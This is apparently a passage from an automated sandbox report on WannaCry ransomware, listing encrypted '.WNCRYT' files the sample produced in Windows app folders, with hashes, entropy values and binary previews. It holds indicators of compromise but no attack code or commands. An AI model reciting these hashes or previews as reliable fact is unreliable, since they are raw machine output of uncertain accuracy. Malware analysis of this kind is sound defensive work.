                                                  SHA-512:37CE925D31DF77885161BAAD41CE5EF269AC49879D9644BD84707B931EC4AF46F248ED11B8E5F80D7CBEE557FE7443E0ABF510068A338432C9642DB792DA6849
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......T..rb.J......n.T)...U...f.yO.q....F..C.y:...s...yfkB..^.\.4...xf.W...i[..Vk.?..RS.L.M..-%.m@........aF...y7"..........G.;.Xh...h...c.#%.X...mL...AVLn.C..........{.8c.;4...J...|e>...c..}.o.mK...Rs......#...*/.$.D .t}...[..9v.a`.....f....J$7..}>Z....)............:-...C.+1..k]P{.1..Z.!a.<a.F..Z+.5e@.A\.o5.o....a...$.y.w..j#wS.?i..bY2W.O0n.`.D!H..pP;1..3.lR_.<G<3..<2c....@d....f....o.c"m.1%WO&...H3..K.....!#]..;...A..8..lA;............X...q.uI..rV.m......,.].S.Fx[.9..;..[...fm=.O.h...D..Wz..z..*.......r..H."....../.K...^26....<.......... (.....n$.P..eE...?2*&B.....!U....,]..=.^.I..Z.....#........."..X....V.4....U.w.....g.e.)...".MZ..dd.|.CKU.J.....?....O~.......4Q..".....E.Y..-.+.z.....9z.E)G.0.4.x.\.[..L...W...zkN&..2....\k.Q........R..z.l.^..5...`...P.....s...Y......%.n._8.^..RMo,."a.5<..A.#F.=.++.%V....U.Tp..&yT.i?>....u...#...$.>....Q.F.Jg..t..&u<N......}b..(u....G...Dc:..co....[...L..oEB....{#..1.$..j[...z....'x..wX..+E#..K..p.

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\6501008900\squaretile.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1848
                                                  Entropy (8bit):7.899603037803772
                                                  Encrypted:false
                                                  SSDEEP:48:bkh8pITzQccjBW7xrSDC1RbF1Ax7eNsXzsg6HM:oDTzKo7xrGC1giNYOM
                                                  MD5:F677B7129878B14B1DE1E3A5A88901AA
                                                  SHA1:E8502BDED0FA2A962F48858DE7D476861C6311E4
                                                  SHA-256:E47D25830FB377F73DA947030E384C027066EE2A6F986A1394DF2A7609D880CB
                                                  SHA-512:38C9C8500FC924AC55DCADBF912D750A2D8E95CE25D76B2631D779A1D2076FD7734BB93226B57BAF1260B1D5280694B6E21F8158DB2D4E2D00B4070005CA2AD1
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....e4])h....$.R..v.A..."....|.&..A..)........_..L.IW.............ud5ij...2....`F.7.}A....dG0.0,tF.....H..u..hu4CP .`~D......ZR..PK.J.J>e.e....J0...~.f......!e...)...U.fO#....7:.MY....d..g....Q.(..</..."M...}...mi..B\.458.X'h@F_S.).v..VgQ..u.h.PXx..q.............e.kp.`.+L..M.....k..!G..z<^.c.....rr-..0...t.G..=...U./I%O..W.OR..B..P..9..E.....V.b...6q.f..tK..7..D..4....il..zy7...%.Q.r...~q^.(.............L.......(.E4.5....u...QP<].F'.Gi.-.G..h...+....{...6.......6D..._\.{......0;......L....Sg......k...8.`...Z.X....%?.P/+.K...^.G..... ..Gr......lH..l..8d...=.B.nQ'.4....d.! *.P..o\.....v:...)V...2....%T.m.?.[|..]_...T.Qz.w...4}....w..+.!H.f8..h.E..^P.I...<.....J(.n...M.../^...{.7O.3.}..k...,...j....t...)#...3z....r.AS8*....W..w.4.8..].....J...............x.2s.rB.*7..i#.Jc.Z\...&.....(E:}...V.j,...?9...w..L.$.'.$........%\....8.f5.P^....J7....,;........ZW.F....1d...<(.j...o.mk..........w&k....K...R.X...K..,`.....,..5S..&..=s....,ft

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\6501008900\tinytile.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1400
                                                  Entropy (8bit):7.850543164774669
                                                  Encrypted:false
                                                  SSDEEP:24:bki6cwI0hFwG75Kx6g1f0cv4YMVwu/SjhtDVHdQ2/LmdWPfceIqJOL3kycm6oEZJ:bk3wGlKxHJv4Bv/khJGdWPNQDkFfPR
                                                  MD5:83DAEDEF446642F77ED2B6591D9E1C59
                                                  SHA1:AD8EE59F986CD4365C2BDA934CA56D553A17D248
                                                  SHA-256:89E20BC3B896172B0E09E41B9648175A69F369D83243F0855C3076788FE8B9C6
                                                  SHA-512:846EFDDD41B92FF597A0199E5834F93C1B3AB63AB1D6739831F6EB1507C1F2A5D49501F76C96C50476520B3A820020E7486F6114E47CE4359B7C7292F1111D5A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....hO..SW.3z...v......C.......F...r......Y.....Ai....W..r..g;.[;kB...d....g...ULNK-.rd.P..l,1_..h...wD7.p7........>3-+.......x.J....<!..2....9.h.m%.1L...u.I!.;.c.....2&.tT..E".m........X.,3..-B...q.A....-.Yf..s.px...H....Z.3...M.^....[0..G..(.R....Y..........|..dT.j.b..3.-..2..)R...c....].i.SI:.<..{..@-..."k...2BY.._..{...-.2EJ.#c.O.5.&...w;L(..(..]A...7`.4.....C.`.7IV.[....4.D....8..}..Vv.Sz9T\......YQ...f.$.+.$...<K.9kh.........(..a.D.....<.j..B.2X...Q.....h..=.n...=.[.F...]}..1.....SY...8...4Fc...i.s%...K.........J.....R.CG....N6.....$...@I...P/.Ll\.U.|!...i.D7e.......;..G...A$.#..0....h=.U39..mr..r.Cv..d_U.~...>...U.y.p.....k`....O..1ni.....c.{...T.%X........%3Z..}.V....I....=.<TUXMV.]Si.RW(+ve..n.......>e..le+...5i`.#l.'E....r ...c....T<....R..kzorog._]L.v.7."7.D.x...u...7H...........'|^W8..~n..62.......E.:.+z.u.>pz..(.N..eM9..oA.Y"..'..1..)....1(..'.G.-..3..;+0..0y7_.ac.Z.6.Yc...)...=.....^...P:.rU.PN|.E.)}...b.c..Fo

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\7603651830\squaretile.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1736
                                                  Entropy (8bit):7.887340737898679
                                                  Encrypted:false
                                                  SSDEEP:48:bk4KIux+M7T9jqCavswRo1llC1TmNHjXMxFQhBPZhuQ5C:o4KDljqCDwRo1yRVxChBPZe
                                                  MD5:3209E08B821A1543E2CE97C88EF5FAB0
                                                  SHA1:99AE16E77BBEF52443946963B91709FA13A6AFAC
                                                  SHA-256:A16E0DFB1CB3DC127809F892E7F80552E82506EC000D6AF72B39F2EB1FA3287C
                                                  SHA-512:AB2B9AFB310335B848068FE87BD821BFB5E28A0C64DD81406D81F87BB059FEB8D922C7AAA55E10022A2E5C3A7F9D38AEAEA9D250638AF73633DBEACEEBC47F71
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....J:...L...`.n.uE...K....[)...D:.h...D0780.....rFc....EM;ZD^.Z.LUm..{.....d%=.. .n.q.*|.:S...4....c.'.....!}Q{T..L....~....d...f...[..}.p..9._.-..A..r]..uQ.`.j.-.8....9...2.........`..z.Z..eW.y._....=.......[.5kh...2.J"..[.j..gQ.E]....g...A.M..#..............*.j.. *.O<.....I..O....!....N[.Z.%<.R.......@%-.........R~..&.....3.....T~...K**.....4FT...A.C.l.1..+Z.+.A...U"-EF..n..\.....Kf.gnt.....N...Hx.... .V3....X.l,.4..\.{.`.ah.r......}L1...........!...|H.U.......V.(f/...n[...L.!.w.j..VX.<..<..Ll.'.{c.s..tu.y.8..#o...G? w9....+./&.......q..8.6.p..f.p.-./.z .dI.../..:}.l....i...4.q..($y4@....5-...5..-g.y..$..7.m...X."~......... X....|?.E.P'.%.5..d.Q...<F.ad.D.....U..W....B".P_.!.<.....s...i.+....M.BQ :aE.|~?Z{.j.......W..../.u....0..C2=......aw..-....5.U%q..... A..].%...?....6..si..3.8...3..j.-........b"..xx....E.L..G..` ,c.9Y....*o....a..eE..2...(..=..t.#..........y..=.........lf....~>...v.5.....}l.[......:.......v....BAz2

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\7603651830\tinytile.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1352
                                                  Entropy (8bit):7.833507954685613
                                                  Encrypted:false
                                                  SSDEEP:24:bk5H8TnCk1B2hWngxCjggN6pT5vPtxd8EJ8lPCt3lQtG0PXEGJP7ihLi:bk5H6jB+Gj5N6ptvPtxd8/at3lQ3PPJv
                                                  MD5:3CE0A0F3030C2C4C720711AFEBB4614B
                                                  SHA1:7E4C8A080637B0B9E73B437DABB5983DAF58BC80
                                                  SHA-256:78D04E977E4F18CED98F7335B2601C2E9C986B7A6CBA4ED322DA781CC444B5FF
                                                  SHA-512:CCCCEC66E011E13F01E1E1E766EDC1799585C09CBCBA792CFA2B2E7FD47D25D9C3BD9A981E719BC13536BF28A55BE615278101E1DB5AD5D8E0327B8916D1AE46
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....L.......z.../...:.~5.......V.bk...;.B.g..2..g..5F.Y.....<.x...7U.-y..\.W.6..._.k(L!...3.n.g......aF.g....M.c.$.)..&.../.t.T.:.....,.).k)G...7|O2.<../..)..C."<N...e2..?.{.a.-r..s..:....y.....Y.&8...|&N..,..d...9v.3.Mm.fLsb5.Ya......UmX..y>a........$........}.........H.WW..W,.....:.6t.W-..>....^.L.g...M.'.*=+.o..@....."../....f.d......b.].y='j.$U....[....'.........'.aC.^........\K1....kay.....P.i_.@..M...5.......R.@sC.T...6..C,...L./J..9... 3.v..?&&....<n............Y.%q.o.q.[)....g........7?.J]fx<mh...N!L.i.5.....Uh...h....b..#....}...R...y>.._..#eM..[v/.B..n..O.......7v.S.JB..i..%8/1..0.E..8#H/s.....c..7........?....!.6*.<._]Vs..k|.....O.a......./K/.U.B...%.Kb.....q........a."*G...&w8.v..x..Kb1.6~.xu..B.........y.:f...i\;...0.hC.{#r5....}..R.%nd."+H....&..9...~7......Q,&...xx..8...x..k...a.%<......Zr...q.....y^}....D.4......i...d0Q`.I.=.N.B."yo..Gq..).Tl...y:.`.oO.]..x...".W...i}..".>.%......B<M..f...vL....-.YS......g..._...>..

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.DiscoveryNotificationTask01_20_08_51_44_0048.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):872
                                                  Entropy (8bit):7.730407812379379
                                                  Encrypted:false
                                                  SSDEEP:24:bkrYK4K9gCawGBYQQTEe9r+XvcPajWMdmjJUNQYpxa:bkrYK4K99/pQWJ9jEmjJYpQ
                                                  MD5:1120392E6DFF1AE2C677247B93AB0F3E
                                                  SHA1:467A5844EB81E10D63E6C8E13F2B3F8B7BB155B8
                                                  SHA-256:B6EC13E1421AB88B1BA1FFC4B78C76CB8D048603289A24CEE58401F3C7528B4A
                                                  SHA-512:7E60B51E3009483933CB319DF7882C1F831BB480323C91C00A8252ED885019D3D48ED328849C4285A6E74017B54E48DAD8ED7EC2F95AF695D6DA462A5FBCE269
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.......[..Z..........t.&}...o..O...aT.........E....<]\`....'.~.'...p)...d..p...,M.%....8..^A.sj._%.No.j....N_.....v...V...........4.o9.:..s..6...N.S.y...I.q!..!...^'F9.....2.b...".:,*...r.._.2.<....?.^.1....).=..(..!.s............g.k...:.......C........p.P..G0`....mAJ.Kn....u.F..U.r.a2......u.....!..8A.T..v.f.:......!.,V.....1+..G.d..d3..mX7..$.0V.u.w..:.......9....qm.04..2.4^...].*.J.8p..].Y0...$!...:..i.%.X..s.V.bAb..1)4.@.P.H.R;.8.W..5N...PQRn.D.'.U.<EG..>\...`.W..I.....0+FX4QX".k.".j.g...d...E>.....}.P....n......lD...A......i..K......5.....H.c.j2+.$>b}..&!...&n.:.I.......*.o...2.B...LH..2r.=.......3|....(.|.K....%A.#..[.F"L..8F.4`....D..$..e..p..^t:Q.....$....].mo.e.=.f..z....@...#j..6..V."d..p8.c....jn.m..@Y..I.w;.5f.m`q..21..U..`.8...]......2.`......$.j9.....-.m.|U.....I..,..6..[.....}O.[q....i...I..L

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.DiscoveryNotificationTask02_23_14_01_00_1738.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):872
                                                  Entropy (8bit):7.746905145533332
                                                  Encrypted:false
                                                  SSDEEP:12:bkE5k+3GoojT1xCTiOa9xxb3Hu8sGSv1TthABi2tYsaZ0205RLX5cyFlAZh:bk3+CjBxCTu9rXu8Dw1H/2tYQ22VFoh
                                                  MD5:0249B0631928219E45B6A0E99737B143
                                                  SHA1:7B43A38A298E472D03406315C63EB3BFC1AA73DD
                                                  SHA-256:876C0075EF03B640FE8A1211DB93DC7CF58E853A7BD969D46DF80815BFD99BFC
                                                  SHA-512:256F0B57700CE94985D6D5DE3098ED146855BFB83340C2255F8FB283A5B487F19F51C11F6515BB488F60B5D31E920A9F0AEB387E08B9343EE3B98DA7F7A40447
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....x.zf..P........`....l9.C......x...kE.........+.....Rz)..'.h.Z..Ep.[.:..f&......{""....@C.-]..........,.4......m...X..4...1.i.>.^Z.)..u.......$.....qf...\t<6lW_.izQr.#.{..}K..Q3E.w..4....p..FW^..<=rM..h.9.9.n....B.Xc.1q34..B0@sW.)(.j...iu.....C........H;...6yOR.d.s.....T.<r....?.Y.7-?.6..m...a.W:..>...?.....>.pa.:....'x..BN.....EP.....4.|.r._|...I...F..Na.M.S.............#t...aM}.:.u.G..g..DQ.I.1TK~..7..F.&/....e.K(.9....[...N.Ou.Sr..X$..U/...N}-l.b-.a...K?...p..2...6.3x..R.9....b....:.5.ac....I.q<..=.@7..0...Zv?=T........c.k~. ..8g..'p.CQ.C......r...:...PB..M.|..J..(.....l.Z2..w.N.W.&..$.....c..gQx>.7..%...W....SU$...L.9..3nq.\.3..%B...Af...'uW.m........6..N..R.8.._u...0O'[.G..3t.@~.IS@.D.E...e....+..Y..$......?......}.1.../.Sv..l!...u.....s.L..4.S.4...v..pN..E.$.r|....0#...B.....ny......z.....ll.....

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.DiscoveryNotificationTask05_15_10_24_58_8363.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):872
                                                  Entropy (8bit):7.745739716219013
                                                  Encrypted:false
                                                  SSDEEP:24:bktZZmDPgmooV1s7U6y5UnCwnwA5+/PI2S6RTUO+g82e2:bktZZWP/V1EU7unH15+4p4T5+wt
                                                  MD5:ADA86F788D6DBA7A5F04BEE8FB7DC9E8
                                                  SHA1:D7D285699FFD446F6D157721D40148D111BFF2B6
                                                  SHA-256:C06165813D41B2A9BBBDA1AFF37A9711BD3101380ED55936C55D91F8E38B8814
                                                  SHA-512:453FBB3C151311B44346292D87C2814FEA12764A1592BCFB9239FFFF9C02E73FF620BD337EC3B634078D51AB45A6667605DDC41F8974A5D08CA9B8B027B7AEAB
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....+...Id..O.....>2%..b.e!..C..+Wr..-.......S[..........g.....T3(.#.........<jT..0.~\@....~...bqY..0L...&...6.(<"..01}(.p..1.....f.p......X..[|n=gQ...NJ.RKp...]2h}.#..3.(.8.$..".z.%/...&Ao...;...]|d.{..;%W4.H...,zC.gw.....L.$..ylf9.8..)..D...WS+..|.....C.........Q...j#.l...B0Kt.;.s..f...R.T.8Ku/.j...<....n.... ....:...l......1_3V..b*...9oR.F.~ ...p..+L0.?>5Z..sY.e\..5N..s...'.......7...'.8.2.#....\]...$.=..K."...A.....%....k.P5H..B..Ul....J...8;..y;.....w.....J....S.P..Sl##..c....Y2....p_7.M..........{..l.i8.)..t.<MS..R>.P....S. ..A....Ut..M.Svew...w?5..}.3!Z...|(.I....8.%I..k..:<.....C........c....Xe#..e.v{.....Re.b.b&r..~N.....k....}I.k.#;X.RQ/.[....O.i.=.d..f...4...2...C..fm..C4.:.f%.c.....j9..hvC4MQx..rsv.o....g..^..Pv........../V..../K.X.3......xx...u].~"7U..(......gb.....}.....p.H.\.....C.*.}~. ....h..7......

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.DiscoveryNotificationTask08_18_15_03_36_7371.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1576
                                                  Entropy (8bit):7.861831447405634
                                                  Encrypted:false
                                                  SSDEEP:48:bkbEJdGBWcqVyPaQLIHygEGumf65VNWXXs:obEJdGkceK7hGQ53yc
                                                  MD5:A9F08CAF1D9DD16BD123B6A923E5610E
                                                  SHA1:02FD3CFAAC9A5E8BF81C5B69A4F1AE2EA12ED45C
                                                  SHA-256:F4244DF13DCF48C00E0A02D4A4E203FA47AE14EB12D37E0867B781C19B011767
                                                  SHA-512:3274FE1CD59BA1FFC5B3A9E668C3CBD567993BD37976A1002602525BB8F91CFE1885AC162896A31B5AC8A5EF4FA97CB336D6FF5B4BFA94606737234651B9C6C1
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......*_...EvT6.......1.5Trc@...%/}<2......d.A.CWR....L..V....9.y.s....H.I..i.`@7...G.f]...(....<..%..p...3...vX...AZ............=.[.&.......p..(.EKd.I...u...A6..T6-..D}gF5.?..-.(..1..zB^0...+.5h..(.r.........e.8....5BdC..P....W.........|..J.............Q...j..vT.Ba..D../C|z.9WPM~..M..D.Y.E.?I...Gq.Dm{VYti.1..V..]c...y..J3.....xnppOj4....$...9n......@..s.....q."...Qb.......V..w,..2{.......h......E."U[..?.Z..%~.fww...p.P........E.M^.N6fk...\...u.. v..`9.P.BF.q,.....c.l.6mF5N$]d.....#.....b.c...9.B.....mY.v4....... .)A.R..Y...3.W.m.+.2.0q...Wa$...Zu..h.S..*W.n.tj.1.. \..W+I.=%.....MW....*.P..@u..$...N....pP...qeS....sV........9....Ic)0..~gL.Y............t.S'J...w..K....R..]w...k......iN..(.....wP~.....H....d...s..i.c.z...*.KM.....X. [.0.W..x...H@.+j......I...R..(u<./.xX...p.`..AT..r.\....A......t..o/i.Tj...S.y...5.%.".....Y...g........" B.=..E.?....C.j.......<.W..0}..@....2[...O&.=+[.c....4Z|..+J.C,}....z..bQ..X.|u`..........

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.DiscoveryNotificationTask08_18_15_05_51_5411.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1576
                                                  Entropy (8bit):7.856055905198148
                                                  Encrypted:false
                                                  SSDEEP:48:bkWU1AeexavrhuEEfCyWJdCnPo0JQQQc9pHeES:oWjeAYk9aTKQQQcjHE
                                                  MD5:857513D809629174C2581883E6FB6450
                                                  SHA1:2A94491A1EC2EC095D83B8436D6E39E1989156B3
                                                  SHA-256:D4333E8B1BF7270C4E91B0DFBE7315CF51CBD19EE065DECA49FBD171FEAF3781
                                                  SHA-512:A42A4D6E8AA0BEFA7F351C9EF8BC9F10CE6F7168963F0B2F4EADB51DCE7C6B0586BC171D066FFC7544AF18D007F8D8DEE2C01CAE330EC7AB400232452824D607
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....9....`o.lyc..r1....?3....%%... ] /.J..2...>...j..-;..../VJc.5..b...Q.@.".....KF...2U.f.JW.{..C.L......uE.M...'....}F1.s.f.8...h.Em.=.N.`....H<.$...\n.9....D.c..|}..Z1.....8...|...A.....V..tq..B...d.(.5.6...G..%....v.<.l{S^.e.{R.UP`..X."................'H|Dh-..p.\.L2CX.c...Y.^.t.c...gb.?..>!...lr.u*;.../F....R...>..`.......\[.z .\....j...t..P.>g....2....t..l...........$........*...Vn.@.9j.s...t..0.....0.6.Q...B.N.8........Q.+8'Xv.e.]w.pe.....Z....{...i..|J......t..w...dUY.W.$..0...d..A..Ab..1.a......5..?..en...u.A.W..E..L...D..[.j.j...Iv..Y......Y./....quU,P. .c..$=:.U..y....&.+>.m.zKv..7..b....Y.8..1nI.2D.......g.../.6.y...X..:A.g4.kI.......A....'..Zp....+...._.P.....eqRC.:.v*.-'C...wdf#vZ..,."m&5AJd.C..L0.Y....-.E...A-...M.......L...kF......4T/.H..|Fy...C".+o.*v.yo...A.............R.........E.u.8.....CD{.<..(.U,v...D...~..0.......@.1I..3.K..]Y....{.qP....-...j.......m+.4L\."Ig. ../`&..1...I.....sa..<!.!.....6....Q".

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.DiscoveryNotificationTask08_18_15_37_00_4351.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1576
                                                  Entropy (8bit):7.87972038682944
                                                  Encrypted:false
                                                  SSDEEP:48:bkpbJHhubwta5vnuNl7fHkqsnBAoYwurPZw:onKwta5/uNlLPsJdIO
                                                  MD5:96229D4DAEBE7CD8529A70ED1EEA64D1
                                                  SHA1:75CCB24BA69CDCFF68CEEBA5F596CC5DE217E35C
                                                  SHA-256:11102664BB6CDDD4BFE0FC64526E31B0DB4EACABC1044D9FE5E1467C6FE75F52
                                                  SHA-512:A94F70B9AA880070007812FB9E95C1D8124A095F40F62E099596ED4F81837A5463779AD3386B3295407D5E5148B5B00465485FE17C18CB9E2947D6553643B378
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......n'......;..T%...s....O._R...r.Z...vJ.|c.....B.......=aB.<...yv..=V...z........U.q.K....gb..F...u7.|B?....q_....>...<.v..=.j)..._#..Oz.#.V"[.p[..O ]N1.......4ef.J.i..@.[...~/...w......';`....4y..fi....aq..0.DW....=....>.@UK;.K.g...gB....n{.o.............R...`.dI.....9]...#....?~F.Z......F.A....._a.....@....+..c./..\..J..,<.@U........8JQ...H.s.c..0-.4W.`.`.5.......Air.x ..\.JZ...j..ftB.L<..,.$.gPn.Sj5.|..k...f... ....f...>..C<.....K9a..LA;.j..@.Z)..g.._./.N..A5.M....-.QI......a..b.k....H.+.j.Tm2.Eb9N.t.g...../.a.6....b|~....:..,..YH.H.BE....|....N...j...{2.B$.$!`2<..T..5$t...l.|.......0..s...6f.).z ...LY....+.H..7.S...d..c.L...|...i.\P.Z-.....Y.........r\KWr.:...{.+..P....U.%S..0.qG....6iR>Y.o..7..Pn.zm...#.+....x.!.g...'h.t"yIW4.AP`(...P.M.S.mr.a.c-.5....(...*.z.....J....F.#}....T.!.......w.PW..c..?..c..4....D9.o.u......S..&....H.=.oe............i'...#.H...K......P..4.]G..5.U........h...d.Xl.k..{. .j.#....ZL..........

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.DiscoveryNotificationTask08_26_11_08_10_4195.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):872
                                                  Entropy (8bit):7.683195187952213
                                                  Encrypted:false
                                                  SSDEEP:24:bklASoQ374deZalPpJZhfVJ3ic4MWKs9tN/:bk+XFr9pJlJ3iF5KsbN/
                                                  MD5:D9178231A8070A35214EE8D25B0B1CF0
                                                  SHA1:9D0ED2B22C5F9F5D161C01281DF2CCEC94DD7CF9
                                                  SHA-256:8DADE24DD75B409BB1A29BD938C998C524988FAB8233CF09339140B86AF02E35
                                                  SHA-512:CAEA46A736073AE8AEED76DC4148203113F1241E5776183345A638428A334F640FE8C9852BB215C8A32C9E22476903D2F0FE02BE0CDA9331023E1CA0FBF45AA7
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.......Q`.Q..CM.}(..O....]...^....B....8{..N.Z...0..O...$..I...g.c....J.;...xCPu...d.-....._.*\..9.9L4...@.o.k..9as.).f.....^....0...q.{.......IZ..EdN....-].x....Z.1..Q..+.X....=8<...$.....(.Be}.`.x......g........1.....{8.(.....h..A...5L....C..........$..cN.8RY.mmV6..~^...6t.....>..Ic.F......a...\...f.....!. b2.c9...2...ga.b.f.6.9h:iM9>...Q.+*?.T(................V.L{[Lw.F2.k...'...!.(..^..2.....O...'?c.%~..YO....Vz..0..B.Q....L....A.r..9.m..9....c.Pd>....@..T.x...Q.H..g&.m.l2..5.tr&lf.Ow.8.z.8.Q....~#.2.O..V.n.s.6O.k...ES.....'N$....9....W..e._.9/:..G3M4..*b.+..i.C&.t..6.2fF6Q...f....cH...6%.`.ca(..o\G...1w..s.b.[y.T*F..%....7.E?.w...$65-..6..Z.A..u?.=.......=.cDu&.5.F&.6$...6.....@@..Cf..W.1..j;.Q......V.....j..?. ...9...x.[..F........(....9R2.,.tq........ Xuz7z.'....N.....Sj...c.a.....y.L

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.DiscoveryNotificationTask09_03_00_44_01_9156.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):872
                                                  Entropy (8bit):7.763954126042651
                                                  Encrypted:false
                                                  SSDEEP:24:bkvTyXlnq9cbaq2h7SyrJ5LX7tR2SLbWLQ:bkvTyFq+OZh77lpLtR2IbJ
                                                  MD5:FDC90EF9CC12CC42A3BAB995455B4702
                                                  SHA1:8F92CFDD61C278D15AA18411BDA0E6FE69667718
                                                  SHA-256:65F47424A8133285F02E76442688E5CE081EA58CCD80D198828FE4A670776B08
                                                  SHA-512:7B018AC8002F3A29E5F7992605026FAC1478A8731FCC6CA523CC2B0DD90DBCCFA1A1CF974C611F1496EE62F0158BD203BFBAB35E66E4B0B93919F8A6F5A2C484
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......+.l..]).9.H.Q...!:;.>Z.0....C.I....j..U........<ft...J....z.#...q.h........yw.......m...{.....^)$.{B?...b1..n...........V.U...)m...5.....I..A?J.M..kv.z...Ug..*1.$.b.P|...a.{R)...?....y...u.v....F./....G....O......e..k.B(..A<8..{i..i...?"kH.J.}.....C.........].l....#.K....L.T.....l|....x./we$..n...d.K...$c.z|...G..2..L..|...Y..t.........i.n..z...1a.rL\.r...(...B:..M_........'.1...~N.......}.~..p...O...uP..g....hzf.4p...{.z.~.M.w?$..w.I....{.,.d.....V".....A9v..k.#@....v,..@K6.*..+.`..._.d....?..Y...........".i.l..z-.......9k+.?.3....O.o\.,.{nWu..."..o..A.Dwk:.`3...9...g..*S4...D/.....'B..q.#..Wd....p.%.V..._.J.U........f..yRo8)..'..........A{...i..Y..o}^...^.W...>.`......e,.a-.&N.~...U..aX...#hvcJ.J.........vh\.v.(.:.d%W;. .......3.[....;...Vq[.....t?..T......t....F4.H.j..e.A......ePS.Bt..&....

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.DiscoveryNotificationTask09_14_09_37_22_0506.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):872
                                                  Entropy (8bit):7.789016006039531
                                                  Encrypted:false
                                                  SSDEEP:24:bkIu5+a51a4/USpQIdIJyr+riKI39d9VBy3C:bkIuEaPa4/USfFr+riKI39gC
                                                  MD5:4A779740D2CCC29AA383785C0960BD23
                                                  SHA1:7C537CBE670D8384A962F07B7B6052EC879DD72C
                                                  SHA-256:423F37FE659A2BFF3093E4E5FF40315EAFA8BD96FDF3AB2AFF52032DFD87B280
                                                  SHA-512:847C592C8E09AC32D3E585B5514E35EB0AF5EE0D1ACF4100F5DF0FFED2E0599951EE39295C6ED6E7948545F7BBED6B3775A276D0349088B31A01DC9329E345C4
                                                  Malicious:false
                                                  Reputation:unknown
